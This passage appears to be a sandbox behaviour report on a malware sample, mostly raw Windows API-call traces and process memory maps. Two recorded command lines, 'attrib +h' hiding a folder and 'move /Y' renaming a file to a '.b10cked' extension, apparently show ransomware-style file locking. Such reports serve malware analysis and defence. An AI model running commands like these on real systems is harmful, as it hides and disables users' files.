SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0206.644] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0206.645] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0206.645] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0206.645] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0206.645] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0206.645] LocalFree (hMem=0x1951e0) returned 0x0 [0206.645] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0206.645] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0206.645] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0206.645] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0206.645] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0206.645] LocalFree (hMem=0x192a10) returned 0x0 [0206.645] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0206.645] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0206.645] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0206.645] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0206.646] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0206.646] LocalFree (hMem=0x198f90) returned 0x0 [0206.646] Sleep 
(dwMilliseconds=0x3e8) [0207.691] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0207.740] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0207.740] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0207.740] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0207.740] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.740] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0207.740] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.740] LocalFree (hMem=0x1951e0) returned 0x0 [0207.740] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0207.740] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0207.740] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.740] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0207.740] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.740] LocalFree (hMem=0x192a10) returned 0x0 [0207.740] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, 
lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0207.740] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0207.740] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.740] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0207.741] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.741] LocalFree (hMem=0x198f90) returned 0x0 [0207.741] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xaf718, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0207.741] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xaf6e8, nSize=0x0, Arguments=0xaf6e4 | out: lpBuffer="\x88\x15\x1a") returned 0x58 [0207.741] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", lpszDst=0x1a1588, cchDstLength=0x58 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n") returned 1 [0207.741] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.741] _write (in: _FileHandle=1, _Buf=0x1a1588*, _MaxCharCount=0x58 | out: _Buf=0x1a1588*) returned 88 [0207.741] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.742] LocalFree (hMem=0x1a1588) returned 0x0 [0207.742] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xaf6f8, nSize=0x0, Arguments=0xaf6f4 | out: lpBuffer="\x98\x15\x1a") returned 0x61 [0207.742] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x1a1598, cchDstLength=0x61 | out: lpszDst="Approximate 
round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0207.742] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.742] _write (in: _FileHandle=1, _Buf=0x1a1598*, _MaxCharCount=0x61 | out: _Buf=0x1a1598*) returned 97 [0207.742] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.742] LocalFree (hMem=0x1a1598) returned 0x0 [0207.742] IcmpCloseHandle (IcmpHandle=0x198bb0) returned 1 [0207.810] LocalFree (hMem=0x1938f0) returned 0x0 [0207.810] LocalFree (hMem=0x19ec28) returned 0x0 [0207.810] WSACleanup () returned 0 [0207.848] exit (_Code=0) Thread: id = 643 os_tid = 0xb7c Thread: id = 646 os_tid = 0xb24 Thread: id = 647 os_tid = 0xc64 Process: id = "450" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16180" os_pid = "0xb6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "444" os_parent_pid = "0xacc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28807 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28808 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28809 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28810 start_va = 0x1d0000 end_va = 0x20ffff 
entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 28811 start_va = 0x2a0000 end_va = 0x2a6fff entry_point = 0x2a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28812 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28813 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28814 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28815 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 28816 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28817 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28818 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28819 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28820 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 28821 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 
region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28822 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28823 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28824 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28825 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28826 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28827 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28828 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28829 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28830 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28831 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28832 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28833 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28834 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 28835 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28836 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 642 os_tid = 0xc00 Process: id = "451" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], 
"NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28854 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28855 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28856 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28857 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28858 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28859 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28860 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28861 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28862 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28863 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" 
filename = "" Region: id = 28879 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28880 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28881 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28882 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 28883 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28884 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28885 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28886 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28887 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28888 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 
28889 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28890 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28891 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28892 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28893 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 28894 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28895 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28896 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28897 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 28898 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 28899 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000002d0000" filename = "" Region: id = 28900 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 28901 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 28902 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 28927 start_va = 0x2e0000 end_va = 0x39ffff entry_point = 0x2e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 644 os_tid = 0xbfc [0195.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf9bc | out: lpSystemTimeAsFileTime=0x1cf9bc*(dwLowDateTime=0xa99916a0, dwHighDateTime=0x1d440a9)) [0195.924] GetCurrentProcessId () returned 0xc30 [0195.924] GetCurrentThreadId () returned 0xbfc [0195.924] GetTickCount () returned 0x378b7 [0195.924] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf9b4 | out: lpPerformanceCount=0x1cf9b4*=25271328198) returned 1 [0195.925] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0195.925] __set_app_type (_Type=0x1) [0195.925] __p__fmode () returned 0x76b331f4 [0195.925] __p__commode () returned 0x76b331fc [0195.925] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0195.925] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0195.925] GetCurrentThreadId () returned 0xbfc [0195.925] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbfc) returned 0x38 [0195.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0195.926] GetProcAddress (hModule=0x76910000, 
lpProcName="SetThreadUILanguage") returned 0x769624c2 [0195.926] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.926] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.926] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf94c | out: phkResult=0x1cf94c*=0x0) returned 0x2 [0195.926] VirtualQuery (in: lpAddress=0x1cf983, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.926] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf91c, dwLength=0x1c | out: lpBuffer=0x1cf91c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0195.926] GetConsoleOutputCP () returned 0x1b5 [0195.926] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.926] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0195.926] _get_osfhandle (_FileHandle=1) returned 0x7 
[0195.926] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0195.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0195.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.927] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.927] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0195.927] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.927] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0195.927] GetEnvironmentStringsW () returned 0x3d0178* [0195.927] FreeEnvironmentStringsW (penv=0x3d0178) returned 1 [0195.928] GetEnvironmentStringsW () returned 0x3d0178* [0195.928] FreeEnvironmentStringsW (penv=0x3d0178) returned 1 [0195.928] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8bc | out: phkResult=0x1ce8bc*=0x40) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0xa0, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, 
lpData=0x1ce8c8*=0x0, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegCloseKey (hKey=0x40) returned 0x0 [0195.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8bc | out: phkResult=0x1ce8bc*=0x40) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, 